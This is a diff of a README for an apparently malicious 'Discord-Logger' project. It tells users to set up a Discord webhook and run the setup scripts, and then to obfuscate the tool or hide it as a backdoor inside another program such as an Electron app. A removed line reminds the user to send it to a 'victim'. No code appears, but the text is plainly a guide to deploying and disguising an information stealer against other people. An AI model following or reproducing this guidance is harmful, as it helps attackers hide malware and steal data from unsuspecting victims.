Bytes128/Discord-Logger/README.md

 # How to use

 1. Create a webhook in your discord server (I recommend to do this on a private server)
-2. Install all of the required modules using: `npm install`
+2. Install all of the required modules by running `install.bat`
-3. Run the CLI using `npm run cli` and fill out the questions respectively to create the configuration file
+3. Create the config by running `config.bat` and filling out the required fields
-4. Here you can choose to obfuscate this code or implement it as a backdoor in a different program (For example: an electron application)
+4. There you go!
+Now you can choose to obfuscate this code or implement it as a backdoor in a different program (For example: an electron application)
 5. Enjoy!
-(Just don't forget to send it to your victim)

 # Extra Information